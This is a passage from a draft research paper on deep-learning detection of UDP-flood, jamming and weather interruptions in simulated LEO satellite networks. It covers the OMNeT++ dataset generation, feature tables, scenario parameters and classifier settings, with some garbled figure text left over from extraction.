+ possibility of preventing DoS attacks by reducing the power consumption of the control center
302
+ while preventing DoS attacks. others propose a system that provides proactive prevention against
303
+ DoS and DDoS attacks, monitoring the network in normal operation with the average number
304
+ of requests circulating, making it possible to block any traffic generating an anomaly. In general,
305
+ implementing any authentication and cryptography solution dramatically decreases the risk of
306
+ being attacked, but the majority of satellite communication systems lack investment in security
307
+ and protection techniques.
308
+ • Specific applications: These solutions developed and intended in particular for security against DDoS
309
+ attacks, from a specific structure, such as the use of the blockchain to advise other users on a attack,
310
+ honeypots using the network to deceive the intruder.
311
+ III. Proposed interruption detection mechanism
312
+ Our work puts into practice different techniques of deep learning in order to propose a solution
313
+ that improves the detection of interruption attacks targeting LEO satellite communications. The
314
+ effectiveness of any machine learning model depends on the availability of rich training data. Thus,
315
+ communication datasets are the essential element of our DL based project. To exceed the problem of
316
+ public DDoS traffic datasets unavailability had to be solved, we propose a simulation technique that
317
+ will allow us to generate a benign communication dataset, with several communication scenarios
318
+ affected by interruptions in satellite networks, a technique dedicated particularly to networks via
319
+ LEO satellites. The well-known simulation tools OMNeT++ and INET library will be used to
320
+ capture the different properties of the simulated satellite communications. We propose a satellite
321
+ networking topology composed of 20 earth terminals, three satellites equipped with processing
322
+ units, inter-satellite links, and satellite-terrestrial links. Each terminal in the topology is assumed
323
+ able to communicate directly with satellites in its reception scope.
324
+ Fig.1 represents the topology used to generate satellite communication traffic during simulation,
325
+ where each orbiting satellite covers an area of the earth. Terminals1..10 are covered by Satellite1
326
+ and Terminals11..20 are covered by the Satellite2. The communication between an earth terminal
327
+ and a satellite is on the frequency channel 1616Mhz. When an End-User from Zone1 wants to
328
+ communicate with another End-User from Zone2, Satellite1 uses the frequency channel 23180MHz
329
+ to send the message to the Satellite3, which in turn transmits it to Satellite2, then this latter finally
330
+ transmits the message to the destination End-User. Dynamic Satellite-to-Satellite routing protocols
331
+ DRAFT
332
+ January 11, 2023
333
+
334
+ 9
335
+ are not supported by the simulator, therefore, Satellite3 uses static routing protocols assuming that
336
+ both Satellite1 and Satellite2 are fixed objects from its point of view.
337
+ Fig. 1: Network topology
338
+ A. Construction of «SATCOM.LEO.NDBPO.#1» dataset
339
+ We would like to mention the work of F.Alhaidari and A.Alrehan, although this project took
340
+ a much different path, the idea of generating this dataset was inspired by their efforts in [48].
341
+ Essentially, two utilities play an important role for datasets’ generation. First, the log console
342
+ which is window available under the GUI of Omnet++, displays message transmission events that
343
+ have taken place between different modules during simulation. Second, the vector file, which records
344
+ network information in time intervals as statistics for each module, as data timestamp. These data
345
+ values are recorded and captured based on several categories or features.
346
+ By combining the data retrieved using both utilities, we obtain relevant information characterized
347
+ with LEO satellites communications properties. We use Jupyter Notebook with our python scripts
348
+ that explore each event in the log file, and for each event it calculates the current, previous and
349
+ next time for each module. To extract the values of the features in the interval between the previous
350
+ time and the next time, the script calculates the value of each feature in the Vector file for each
351
+ communication event according to the following equation 1:
352
+ For each feature i and event j (with n the number of nodes in communication):
353
+ V alFeati(eventj) =
354
+ n
355
+
356
+ k=1
357
+ V alFeatiNodek[Previous event time, Next event time]
358
+ (1)
359
+ Fig.2 presents the workflow of the dataset’s creation.
360
+ January 11, 2023
361
+ DRAFT
362
+
363
+ Space
364
+ 23180MHz
365
+ 23180MHz
366
+ ISL
367
+ Satellite 3
368
+ ISL
369
+ Satellite 1
370
+ Satellite 2
371
+ 1616.99MHz
372
+ 1616.99MHz
373
+ ee
374
+ EndUser 11..20
375
+ satellite 3
376
+ coverage area
377
+ EndUser 1..10
378
+ Zone 2
379
+ Satellite1
380
+ Satellite 2
381
+ coverage area
382
+ coverage ares10
383
+ Fig. 2: Features extraction flow.
384
+ We use another python script to generate more features and enrich the dataset, as notation we
385
+ call reference local time for packets with the same sender, receiver and protocol, and global time to
386
+ reference any packet sent or received.
387
+ B. Construction of «SATCOM.LEO.NDBPO.#2» dataset
388
+ This dataset serves the purpose of implementing a flow based intrusion detection system (IDS),
389
+ which would be more suitable for real-time detection. We use the module «PcapRecorder» of
390
+ Omnet++ to record the communication traffic that passes to or from a node in the topology.
391
+ After the generation of the communication pcap files we use «TcpReplay» tool to regenerate the
392
+ simulation traffic on an environment external to the simulation.
393
+ Several features similar to the previous dataset are used, combined with other new flow-based ones
394
+ that are created with python scripts. A communication flow is any continuous and uninterrupted
395
+ communication, that does not contains any error message due to an unreachable destination.
396
+ DRAFT
397
+ January 11, 2023
398
+
399
+ For each instancej
400
+ For each instancei
401
+ Search Aet @
402
+ Filter by A et @
403
+ Final log file
404
+ Feature i
405
+ 2,r
406
+ True
407
+ ADD VALUE
408
+ J >= 0 >=
409
+ Sum of added
410
+ False
411
+ values
412
+ True
413
+ Last
414
+ instance
415
+ False
416
+ False
417
+ Next line
418
+ Update
419
+ =>
420
+ in feature_i
421
+ dataset
422
+ True
423
+ A: Sender_j
424
+ Q: Previous time
425
+ @: Time_i
426
+ I: Next time
427
+ add most recent value
428
+ @-I=minimum11
429
+ Tab.I summarizes different features in the datasets:
430
+ TABLE I: Description of «SATCOM.LEO.NDBPO.#1» and «SATCOM.LEO.NDBPO.#2» features
431
+ No.
432
+ Feature
433
+ Description
434
+ Dataset#1
435
+ Dataset#2
436
+ -
437
+ sendTime
438
+ Sending time according to the sniffed packet
439
+ yes
440
+ yes
441
+ -
442
+ sender
443
+ Packet sender
444
+ yes
445
+ yes
446
+ -
447
+ reciever
448
+ Packet receiver
449
+ yes
450
+ yes
451
+ -
452
+ IP
453
+ src
454
+ Ip Address of the source
455
+ yes
456
+ yes
457
+ -
458
+ port
459
+ src
460
+ Port of the source
461
+ yes
462
+ yes
463
+ -
464
+ IP
465
+ dest
466
+ Ip Addres of the destination
467
+ yes
468
+ yes
469
+ -
470
+ port
471
+ dest
472
+ Port of the destination
473
+ yes
474
+ yes
475
+ -
476
+ Frequency
477
+ Transmission frequency
478
+ yes
479
+ no
480
+ 1
481
+ Next
482
+ Current
483
+ diff
484
+ Global time difference between current and next
485
+ yes
486
+ yes
487
+ 2
488
+ Next
489
+ Pre
490
+ diff
491
+ Global time difference between previous and next
492
+ yes
493
+ yes
494
+ 3
495
+ SNext
496
+ Current
497
+ diff
498
+ Local time difference between current and next
499
+ yes
500
+ yes
501
+ 4
502
+ SNext
503
+ Pre
504
+ diff
505
+ Local time difference between previous and next
506
+ yes
507
+ yes
508
+ 5
509
+ size
510
+ Packet size
511
+ yes
512
+ yes
513
+ 6
514
+ channel
515
+ Frequency channel
516
+ yes
517
+ yes
518
+ 7
519
+ duration
520
+ Transmission duration
521
+ yes
522
+ no
523
+ 8
524
+ packet
525
+ type
526
+ Packet type (Udp,Icmp)
527
+ yes
528
+ yes
529
+ 9
530
+ rcvdPK
531
+ Recieved packets
532
+ yes
533
+ no
534
+ 10
535
+ sentPK
536
+ Sent packets
537
+ yes
538
+ no
539
+ 11
540
+ droppedPKWrongPort
541
+ Dropped packets, wrong ports
542
+ yes
543
+ no
544
+ 12
545
+ DataQueueLen
546
+ Data queue length
547
+ yes
548
+ no
549
+ 13
550
+ passedUpPk
551
+ Passed up packets
552
+ yes
553
+ no
554
+ 14
555
+ rcvdPKFromHL
556
+ Received from higher layer
557
+ yes
558
+ no
559
+ 15
560
+ rcvdPKFromLL
561
+ Received from lower layer
562
+ yes
563
+ no
564
+ 16
565
+ sentDownPK
566
+ Sent down packets
567
+ yes
568
+ no
569
+ 17
570
+ DropPKByQueue
571
+ dropped packets from queue
572
+ yes
573
+ no
574
+ 18
575
+ snir
576
+ Signal-to-interference-plus-noise ratio
577
+ yes
578
+ yes
579
+ 19
580
+ throughput
581
+ Transmission throughput
582
+ yes
583
+ yes
584
+ 20
585
+ Flow Bytes
586
+ s
587
+ Flow’s bytes per second
588
+ no
589
+ yes
590
+ 21
591
+ Flow Packets
592
+ s
593
+ Flow’s packets per second
594
+ no
595
+ yes
596
+ 22
597
+ meanT
598
+ b
599
+ 2P
600
+ Mean time between two packets
601
+ no
602
+ yes
603
+ 23
604
+ maxT
605
+ b
606
+ 2P
607
+ Maximum time between two packets
608
+ no
609
+ yes
610
+ 24
611
+ minT
612
+ b
613
+ 2P
614
+ Minimum time between two packets
615
+ no
616
+ yes
617
+ C. Description of the different scenarios
618
+ We focus on various security aspects related to services’ availability, in order to achieve this we do
619
+ not consider network flooding attacks solely, we rather include meteorological and other jamming
620
+ disruption scenarios.
621
+ 1) Scenario 1 «Benign traffic»: Based on the topology shown in Fig.1, benign communication is
622
+ achieved by a stream based on UDP protocol, it simulates real-time running applications such as
623
+ voice and video, which cannot wait for recovery mechanisms such as retransmissions. The protocol’s
624
+ performance through a satellite network is characterized as having a significant delay depending on
625
+ January 11, 2023
626
+ DRAFT
627
+
628
+ 12
629
+ the height of the satellite orbit and the number of satellite hops. It should be noted that Omnet++
630
+ does not allow three-dimensional simulation, for this reason the height of the satellites is ignored,
631
+ but the characteristics of the network are based on the actual performances of a LEO satellite.
632
+ Benign traffic is labeled «Normal».
633
+ Note: «Omnet++» does not implement frequency division protocols, but allows communication
634
+ through channel numbers, so if two nodes use two different channels, they cannot communicate.
635
+ Note 2: The «Simulation time» intervals can be set freely depending on the power of the computer
636
+ in hand.
637
+ 2) Scenario 2 «Malicious ”UDP Flood” traffic»: This traffic is a DDoS attack targeting the
638
+ satellites communications, this attack is carried out by infecting certain earth terminals of the
639
+ network, to send larger packets with a higher transmission rate. This malicious traffic is labeled
640
+ «UDP Flood attack»,
641
+ and
642
+ carried
643
+ out
644
+ by
645
+ adding
646
+ another
647
+ communication
648
+ flow
649
+ sent
650
+ by
651
+ contaminated users. Fig.3 is a graphic demonstration of this attack.
652
+ Fig. 3: Network topology of UDP flood attacks.
653
+ 3) Scenario 3 «Natural interruption ”Rain and thunderstorms”»: Among the natural disruptions
654
+ are meteorological events, such as torrential downpours and aggressive thunderstorms, which
655
+ actually dramatically increase the rate of loss in satellite communication, This traffic is carried
656
+ out by modifying the path loss for the affected users. Fig.4 describes this scenario.
657
+ 4) Scenario 4 «Jamming network interference»:
658
+ We achieve satellite network jamming by
659
+ simulating aircrafts (JamCrafts) that fly in the field of view of satellites antennas, send and
660
+ receive noise signals in the same radio frequencies used by the targeted satellite, this traffic is
661
+ carried out by adding another communication flow between attacking aircraft and ground agents.
662
+ DRAFT
663
+ January 11, 2023
664
+
665
+ Space
666
+ 23180MHz
667
+ 23180MHz
668
+ Z
669
+ ISL
670
+ Satellite 3
671
+ ISL
672
+ SatelliteE
673
+ atellite2
674
+ 1616.99MHz
675
+ 1616.99MHz
676
+ EndUser
677
+ (Zambies)
678
+ EndUser (Zambies)
679
+ EndUser 11..20
680
+ Satellite 3
681
+ coverage area
682
+ Satellite 1
683
+ Satellite 2
684
+ coverage area
685
+ coverage area13
686
+ Fig. 4: Network topology of natural disruptions.
687
+ Fig.5 is an abstraction of this attack.
688
+ Fig. 5: Network topology of jamming attacks.
689
+ January 11, 2023
690
+ DRAFT
691
+
692
+ Space
693
+ 23180MHz
694
+ 23180MHz
695
+ ISL
696
+ Satellite 3
697
+ ISL
698
+ Satellite1
699
+ Satellite 2
700
+ .1616.99MHz
701
+ EndUser 11..20
702
+ Satellite3
703
+ coverage area
704
+ EndUser 1..10
705
+ Satellite 1
706
+ Satellite 2
707
+ coverage area
708
+ coverage aresSpace
709
+ 23180MHz
710
+ 23180MHz
711
+ Z
712
+ ISL
713
+ Satellite 3
714
+ ISL
715
+ Satellite 1
716
+ Satellite 2
717
+ 1616.99MHz
718
+ EndUser 11..20
719
+ Satellite3
720
+ coverage area
721
+ Endu
722
+ ser 1..10
723
+ Satellite 1
724
+ Satellite 2
725
+ coverage area
726
+ coverage area14
727
+ Tab. II Describes the characteristics of different flows and scenarios.
728
+ TABLE II: Description of the characteristics of benign traffic
729
+ Parameters
730
+ Scenario 1
731
+ Scenario 2
732
+ Scenario3
733
+ Scenario 4
734
+ Number of terminals
735
+ 20
736
+ 20
737
+ 20
738
+ 20
739
+ Number of affected terminal
740
+ /
741
+ 6
742
+ 10
743
+ /
744
+ Number of satellites
745
+ 3
746
+ 3
747
+ 3
748
+ 3
749
+ Benign source ports
750
+ 5555,3099,2099
751
+ 5555,3099,2099
752
+ 5555,3099,2099
753
+ 5555,3099,2099
754
+ Benign destination ports
755
+ 2000,9901,9902
756
+ 2000,9901,9902
757
+ 2000,9901,9902
758
+ 2000,9901,9902
759
+ Targeted satellite
760
+ /
761
+ satellite 3
762
+ satellite 2
763
+ satellite 1
764
+ Malicious source ports
765
+ /
766
+ 2001
767
+ /
768
+ /
769
+ Malicious destination ports
770
+ /
771
+ 2002
772
+ /
773
+ /
774
+ Total number of channels
775
+ 22
776
+ 22
777
+ 22
778
+ 22
779
+ Normal Packets size
780
+ [40B,635B]
781
+ [40B,635B]
782
+ [40B,635B]
783
+ [40B,635B]
784
+ Attack Packets size
785
+ /
786
+ [4000B,5000B]
787
+ /
788
+ /
789
+ Normal transmission rate
790
+ [100ms,400ms]
791
+ [100ms,400ms]
792
+ [100ms,400ms]
793
+ [100ms,400ms]
794
+ Attack transmission rate
795
+ /
796
+ [20ms,50ms]
797
+ /
798
+ /
799
+ Inter-satellite communication channel
800
+ 30 , 31
801
+ 30 , 31
802
+ 30 , 31
803
+ 30 , 31
804
+ Ch between satellite 0 & EndUsers [0..9]
805
+ [0..10]
806
+ [0..10]
807
+ [0..10]
808
+ [0..10]
809
+ Ch between satellite 0 & EndUsers [10..19]
810
+ [10..19]
811
+ [10..19]
812
+ [10..19]
813
+ [10..19]
814
+ Path loss
815
+ 2
816
+ 2
817
+ 4
818
+ 2
819
+ Satellite transmitter power
820
+ 7W
821
+ 7W
822
+ 7W
823
+ 7W
824
+ EndUser transmitter power
825
+ 7W
826
+ 7W
827
+ 7W
828
+ 7W
829
+ Number of ground agents
830
+ /
831
+ /
832
+ /
833
+ 10
834
+ Number of JamCrafts
835
+ /
836
+ /
837
+ /
838
+ 1
839
+ Ch between JamCraft & JamUsers [0..9]
840
+ /
841
+ /
842
+ /
843
+ [0..10]
844
+ JamCraft transmitter power
845
+ /
846
+ /
847
+ /
848
+ 12W
849
+ JamUser transmitter power
850
+ /
851
+ /
852
+ /
853
+ 20W
854
+ Attack duration
855
+ 0s
856
+ 33s
857
+ 26s
858
+ 80s
859
+ Simulation time (dataset#1)
860
+ 0s-90s
861
+ 90s-123s
862
+ 124-250s
863
+ 250s-330
864
+ Simulation time (dataset#2)
865
+ 0s-900s
866
+ 900s-1500s
867
+ 3000s-4500s
868
+ 1500s-3000s
869
+ D. Applying Deep Learning
870
+ The first step in applying a machine learning algorithm is data normalization, which is the process
871
+ of resizing the dataset’s attributes into a particular range, such as between 0 & 1 or 1 & -1. Data
872
+ normalization prepares datasets to be fed into ML classifiers, in order improve the accuracy of the
873
+ results. We normalize our datasets with the min-max function [49]:
874
+ X =
875
+ (x − Min)
876
+ (Max − Min)
877
+ (2)
878
+ We then standardize and label the datasets, and implement different deep learning algorithms and
879
+ compare their efficiency, we test several models such as MLPs, CNNs and RNNs, the workflow to
880
+ achieve our goals is as follows:
881
+ DRAFT
882
+ January 11, 2023
883
+
884
+ 15
885
+ 1) Training phase: This is the first step to create a classifier, it is necessary to find the most
886
+ adequate parameters of the algorithms for the classification problem in hand, this makes it possible
887
+ to create an intelligent model offering high precision rates. The input dataset dataset will be divided
888
+ into three parts containing 40%, 30% and 30% of the dataset’s totality, the first part is used to
889
+ train the model and modify the weights of the algorithm. To ensure that the model does not overfit,
890
+ the second part is used for the validation of the model, so that at each iteration, the model is only
891
+ updated if it performs better on the validation set.
892
+ 2) Evaluation phase: The last 30% of the splits, is used to test the new model, and display results
893
+ in a format allowing its evaluation, which is done according to the following factors (Annotations:
894
+ TP = True positives, FP = False positives, FN = False negatives, TN = True negatives [49]):
895
+ • Accuracy: The percentage of correct classifications of the model:
896
+ Accuracy =
897
+ TP+TN
898
+ TP+FP+TN+FN
899
+ • Precision: The percentage of correct positive instances out of the total predicted positive cases:
900
+ Precision =
901
+ TP
902
+ TP+FP
903
+ • Recall: The percentage of positive instances out of the total of actual positive instances: Recall =
904
+ TP
905
+ TP+FN
906
+ • Sum
907
+ of
908
+ probabilities:
909
+ The
910
+ total
911
+ sum
912
+ of
913
+ the
914
+ probabilities
915
+ of
916
+ the
917
+ correct
918
+ classes:
919
+ sum prob = �n
920
+ k=1 Prob class correct
921
+ • Confusion matrix: The rate of false or correct predictions by class.
922
+ E. Workflow/Different steps of implementation
923
+ 1) Offline detection under simulation: Here, we suppose that the controller (agent), has full
924
+ surveillance on the simulated LEO network, so we assume he can monitor all the modules
925
+ participating in the communication, this means that the generated dataset contains all the
926
+ packets sent or received, and all features related to the network. This way, it becomes possible to
927
+ find the most significant characteristics and have a precise and deeply detailed description of the
928
+ important element for a safe satellite network (in the simulation environment).
929
+ 2) Offline / online detection: : In this scenario, the specific constraints and conditions of a
930
+ satellite communication network are taken more into account, such as: Electric power limitation,
931
+ Computing power constraints, information availability and unavailability, Necessity of online
932
+ detections, Impossibility of live surveillance on EndUsers.
933
+ In this case, we set surveillance at satellites level, the security agent can only monitor them or earth
934
+ January 11, 2023
935
+ DRAFT
936
+
937
+ 16
938
+ stations. This makes it possible to simulate a satellite by a virtual machine which will capture in
939
+ real time, the communication flow generated from the simulation environment. This approach was
940
+ used to create the «SATCOM.LEO.NDBPO.#2» dataset.
941
+ TcpReplay tool allows us to generate traffic with the same send and receive time values, the
942
+ satellite uses our own sniffer programmed in python, that captures the packets, processes them
943
+ and transmits the processed data via the best performing deep learning model.
944
+ IV. Environment preparation and datasets generation
945
+ In this section, we put into action our solution, evaluate the generated flow and our anomaly based
946
+ detection approach in a working environment that allows the creation of a communication network
947
+ composed of LEO satellites.
948
+ A. Work environment
949
+ We use an ultra-portable Notebook ”Lenovo T490s” with a Core (TM) i7-8665U processor (1.90
950
+ GHz, up to 4.80 GHz with Turbo Boost, 4 Cores, 8 Threads, 8 MB Cache), 64 bits and 16 GB of
951
+ RAM, equipped with a Windows 10 Pro operating system and two VMs with a Linux OS Ubuntu
952
+ 16.04 LTS.
953
+ Installation of the simulator: We install the Omnet++ simulation tool, its vendors offer a step-by-
954
+ step manual which can be found under [50]. We use Omnet++ v4.6 but we recommend installing it
955
+ under a Linux environment for version compatibility reasons, we use Ubuntu 16.04. After installing
956
+ the simulator, it is necessary to download and import the open source INET v2.5 model library
957
+ into Omnet++, a complete manual can be found under [51].
958
+ Topology implementation: To achieve the architecture seen in Fig.1, we use a combination of
959
+ modules created under Omnet++, detailed in Tab.III:
960
+ 1) Dataset generation: We generate «SATCOM.LEO.NDBPO.#1» by extracting the useful instances
961
+ from the log file and then enriching them with the information gathered from the vector file. Fig.7
962
+ file shows how Omnet++ generates the contents of the «final log file» in Fig.2.
963
+ For «SATCOM.LEO.NDBPO.#2» we use the pcap file generated by the simulator and captured
964
+ with PcapRecorder from satellite[0] node, then on a new Ubuntu VM equipped with «TcpReplay»
965
+ and a customized sniffer, that capture packets in real time and simultaneously creates instances of
966
+ the second dataset.
967
+ DRAFT
968
+ January 11, 2023
969
+
970
+ 17
971
+ TABLE III: Description of the main Omnet’s nodes in the network topology
972
+ Name
973
+ Description
974
+ EndUser
975
+ An extension of Inet’s ’Sat
976
+ User’ module modified to represent a terrestrial user.
977
+ & JamUser
978
+ ....................
979
+ Satellite
980
+ An extension of the ’Satellite’ module of OS3 (Omnet’s Open Source Satellite Simulator
981
+ developed at the Communication Networks Institute, TU Dortmund, Germany [58]) modified
982
+ and equipped with a communication network interface and a radio interface to represent
983
+ a satellite able to receive and transmit messages.
984
+ .............
985
+ ChannelControl
986
+ This is an instance in every network model that contains mobile or wireless nodes. This
987
+ module is informed of the location and movement of nodes, and determines which nodes are
988
+ within communication or interference distance.
989
+ JamCraft
990
+ A custom module representing an aircraft with the ability to transmit stray radio signals
991
+ covering a large land area.
992
+ Fig. 6: Topology under Omnet.
993
+ B. Information on the generated datasets
994
+ The generation time of a dataset is as important as the response time and the detection time,
995
+ whether offline or in real time. Tab.IV illustrates some statistics on the cost in terms of time.
996
+ Note that two datasets cannot be compared without context, because the first contains more
997
+ information
998
+ with
999
+ a
1000
+ total
1001
+ monitoring
1002
+ on
1003
+ the
1004
+ network
1005
+ in
1006
+ a
1007
+ simulation
1008
+ period
1009
+ of
1010
+ 330s
1011
+ January 11, 2023
1012
+ DRAFT
1013
+
1014
+ Event#1
1015
+ t=os
1016
+ Msgstats:242scheduled/908existing/908created
1017
+ In:LEO_sim.R U.networkLayer.ip(IPv4,id=47)
1018
+ At:lastevent+Os
1019
+ 10
1020
+ +100
1021
+ +1000
1022
+ +1e4
1023
+ sec
1024
+ Zo0m:1.00x
1025
+ JamUser/JamCraft
1026
+ Satellite
1027
+ EndUser18
1028
+ Fig. 7: A sample of the contents of the «log» file
1029
+ TABLE IV: Statistics on the datasets generation
1030
+ Dataset
1031
+ SATCOM.LEO.NDBPO.#1
1032
+ SATCOM.LEO.NDBPO.#2
1033
+ Scenarios
1034
+ Scn 1+2
1035
+ Scn 1
1036
+ Scn 3
1037
+ Scn 1+2
1038
+ Scn 1
1039
+ Scn 3
1040
+ Packet extraction time
1041
+ 47.70s
1042
+ 18.92s
1043
+ 30.88s
1044
+ 1500s
1045
+ 1500s
1046
+ 1500s
1047
+ Time to remove unnecessary csvs
1048
+ 9.28s
1049
+ 7.83s
1050
+ 8.43s
1051
+ /
1052
+ /
1053
+ /
1054
+ Feature creation time
1055
+ 1089.49s
1056
+ 842.53s
1057
+ 470.58s
1058
+ /
1059
+ /
1060
+ /
1061
+ Time to add features
1062
+ 111.88s
1063
+ 26.68s
1064
+ 10.24s
1065
+ 242s
1066
+ 151s
1067
+ 160s
1068
+ Radio features addition time
1069
+ /
1070
+ /
1071
+ /
1072
+ 16h
1073
+ 9h
1074
+ 10h
1075
+ Normalization time
1076
+ 22.93s
1077
+ 278.60s
1078
+ (total size = 252MB), and the second dataset is a capture of the satellite[0] during a simulation
1079
+ period of 4500s (total size = 929 Mo).
1080
+ 1) Dataset with binary classes: The classes «Normal» & «Rain and Thunderstorms» are considered
1081
+ as a single class which represents the benign flow, and the two classes «UDP Flood attack» &
1082
+ «Jamming attack» are considered attack flows. Fig.8 and Fig.9 demonstrate these distributions.
1083
+ Fig. 8: Flow breakdown of
1084
+ «SATCOM.LEO.NDBPO.#1»
1085
+ Fig. 9: Flow breakdown of
1086
+ «SATCOM.LEO.NDBPO.#2»
1087
+ DRAFT
1088
+ January 11, 2023
1089
+
1090
+ +1e-9
1091
+ +1e-8
1092
+ +1e-7
1093
+ +1e-6
1094
+ +1e-5
1095
+ +1e-4
1096
+ +0.001
1097
+ +0.01
1098
+ +0.1
1099
+ +1
1100
+ +10
1101
+ +100
1102
+ +1000
1103
+ +1e4sec
1104
+ Zoom:0.62x
1105
+ Event+,Time
1106
+ Src/Dest
1107
+ Name
1108
+ LInfo
1109
+ #112260.178097633932
1110
+ EndUser[17]
1111
+ satellite[1
1112
+ UDP:19.11.18.100.5555>
1113
+ 19.11.15.100.2000:(295)
1114
+ IPV4:
1115
+ #11236.178189675287
1116
+ satellite[1
1117
+ EndUser[17
1118
+ wlan-ack
1119
+ WLAN
1120
+ ack 0A-AA-00-00-00-14
1121
+ RADI0 from (1100,450,0)on 2400MHz
1122
+ ch=17,
1123
+ duration=o.
1124
+ #11247.178521675287
1125
+ satellite[1
1126
+ EndUser[17]
1127
+ UDPBasicAppData-1cPacket:287bytes
1128
+ UDP:19.11.18.100.5555>19.11.15.100.2000:(295)
1129
+ IPv4:19.11.18.100>1
1130
+ #112550.178610155609
1131
+ satellite[o]
1132
+ EndUser[5]UDPBasicAppData-1cPacket:584bytes
1133
+ UDP:19.10.1.105.5555>19.10.1.108.2000:(592)
1134
+ IPv4:19.10.1.105>19.10
1135
+ #112550.178610155609
1136
+ satellite[o]
1137
+ JamCraft UDPBasicAppData-1 cPacket:584 bytes
1138
+ UDP:19.10.1.105.5555>19.10.1.108.2000:(592)
1139
+ IPv4:19.10.1.105>19.10.1
1140
+ #112590.178707343666
1141
+ satellite[]
1142
+ EndUser[14]
1143
+ arpREPLY
1144
+ ARPreply:19.11.15.100=0A-AA-00-00-00-11 (d=19.11.
1145
+ #112850.179192675287
1146
+ satellite[]
1147
+ EndUser[17
1148
+ UDPBasicAppData-1cPacket:287bytes
1149
+ UDP:19.11.18.10Q.F
1150
+ Content of the file
1151
+ #11288 0.179214717377
1152
+ satellite[o]
1153
+ Enduser[8
1154
+ TCMD
1155
+ h-hia
1156
+ 10101Attack
1157
+ 25.7%
1158
+ 74.3%
1159
+ NormalAttack
1160
+ 31.9%
1161
+ 68.1%
1162
+ Normal19
1163
+ 2) Multi-class dataset: Each class has its own label. Fig.10 and Fig.11 demonstrate the flow
1164
+ breakdown by class.
1165
+ Fig. 10: Flow breakdown* of
1166
+ «SATCOM.LEO.NDBPO.#1»
1167
+ Fig. 11: Flow breakdown* of
1168
+ «SATCOM.LEO.NDBPO.#2»
1169
+ Figs.12 and 13 show more distribution details of normal and abnormal flows of the three
1170
+ interruption
1171
+ types.
1172
+ Both
1173
+ datasets
1174
+ can
1175
+ be
1176
+ found
1177
+ at
1178
+ https://github.com/NacereddineSitouah/Interruption LEO SAT master.
1179
+ Fig. 12: Flow breakdown** of
1180
+ «SATCOM.LEO.NDBPO.#1»
1181
+ Fig. 13: Flow breakdown** of
1182
+ «SATCOM.LEO.NDBPO.#2»
1183
+ January 11, 2023
1184
+ DRAFT
1185
+
1186
+ Jamming_attack
1187
+ Rain_andThunderstorms
1188
+ 2.6%
1189
+ 14.8%
1190
+ Normal
1191
+ 59.5%
1192
+ 23.1%
1193
+ UDP_Flood_attackJamming_ attack
1194
+ Rain and Thunderstorms
1195
+ 4.9%
1196
+ 17.6%
1197
+ 50.6%
1198
+ Normal
1199
+ 27.0%
1200
+ UDP_ Flood_attackUDP_Flood_attack
1201
+ Jamming_attack
1202
+ Rain_ and ThunderstormsUDP flood attack
1203
+ Jamming_attack
1204
+ Normal traffic
1205
+ Attack traffic
1206
+ Rain and Thunderstorms20
1207
+ V. Performance evaluation of the proposed model
1208
+ In this section, we apply the following algorithms for binary and multi-class classifications: MLP,
1209
+ CNN, RNN, GRU, and LSTM.
1210
+ We use Anaconda v4.10.1[52] which is a python v3.8.5 distribution that includes several data-science
1211
+ libraries. We also use the Pytorch [53] library, which is one of the best for machine learning. For
1212
+ programming and building models we use Jupyter Notebook [54]and VS Code v1.41.1 [55].
1213
+ Classifiers parameters : Tab.V contains the various parameters used in the classification models that
1214
+ had the best performances. The selection procedure was performed by setting multiple parameters
1215
+ and then altering them one by one until the optimal parameters were found. For all models we find
1216
+ that ReLU, Softmax and the value 0.003 were the best as activation function, output activation
1217
+ function and learning rate respectively, we also used the value 0 as dropout rate through all models.
1218
+ TABLE V: Deep learning classifier’s parameters
1219
+ Dataset
1220
+ SAT-COM.LEO.NDBPO.#1
1221
+ SAT-COM.LEO.NDBPO.#2
1222
+ MLP
1223
+ Input size
1224
+ 19
1225
+ 14
1226
+ Number of hidden layers
1227
+ 2
1228
+ 4
1229
+ Number of neurons - hidden layer 1
1230
+ 350
1231
+ 64
1232
+ Number of neurons - hidden layer 2
1233
+ 400
1234
+ 140
1235
+ Number of neurons - hidden layer 3
1236
+ /
1237
+ 200
1238
+ Number of neurons - hidden layer 4
1239
+ /
1240
+ 32
1241
+ Number of epochs
1242
+ 50
1243
+ 200
1244
+ Batch size
1245
+ 1
1246
+ 300
1247
+ Loss Function
1248
+ Negative Log Likelihood Loss
1249
+ Cross Entropy Loss
1250
+ Optimizer algorithm
1251
+ Stochastic Gradient Descent
1252
+ Optimizer
1253
+ adaptive moment estimation
1254
+ (Adam)
1255
+ «C» = RNN / LSTM / GRU
1256
+ Input size
1257
+ 19
1258
+ 14
1259
+ Number of layers «C»
1260
+ 3
1261
+ 2
1262
+ Hidden projection layer size (dimension)
1263
+ 132
1264
+ 132
1265
+ Activation function
1266
+ Tanh
1267
+ Tanh
1268
+ Number of epochs (RNN)
1269
+ 50
1270
+ 800
1271
+ Number of epochs (GRU)
1272
+ 50
1273
+ 200
1274
+ Number of epochs (LSTM)
1275
+ 50
1276
+ 100
1277
+ Batch size
1278
+ 1
1279
+ 600
1280
+ Loss Function
1281
+ Negative Log Likelihood Loss
1282
+ Negative Log Likelihood Loss
1283
+ Optimizer algorithm
1284
+ Stochastic Gradient Descent
1285
+ Optimizer
1286
+ Stochastic Gradient Descent
1287
+ Optimizer
1288
+ CNN
1289
+ Input size
1290
+ 18 (3*6)
1291
+ /
1292
+ Number of convolutional layer
1293
+ 3
1294
+ /
1295
+ Number of convolutional neuron - conv layer 1
1296
+ 8
1297
+ /
1298
+ Kernel size / stride / padding - conv layer 1
1299
+ (3x3) / 1 / 1
1300
+ /
1301
+ Kernel size / stride - Pooling layer 1
1302
+ (1x1) [no effect] / 1
1303
+ /
1304
+ DRAFT
1305
+ January 11, 2023
1306
+
1307
+ 21
1308
+ Number of convolutional neuron- conv layer 2
1309
+ 12
1310
+ /
1311
+ Kernel size / stride / padding - conv layer 2
1312
+ (3x3) / 1 / 1
1313
+ /
1314
+ Kernel size / stride - Pooling layer 2
1315
+ (1x1) [no effect] / 1
1316
+ /
1317
+ Number of convolutional neuron - conv layer 3
1318
+ 18
1319
+ /
1320
+ Kernel size / stride / padding - conv layer 3
1321
+ (3x3) / 1 / 1
1322
+ /
1323
+ Kernel size / stride - Pooling layer 3
1324
+ (1x1) [no effect] / 1
1325
+ /
1326
+ Number of fully connected layers
1327
+ 2
1328
+ /
1329
+ Number of neurons - hidden layer 1
1330
+ 350
1331
+ /
1332
+ Number of neurons - hidden layer 2
1333
+ 400
1334
+ /
1335
+ Number of epocs
1336
+ 50
1337
+ /
1338
+ Batch size
1339
+ 1
1340
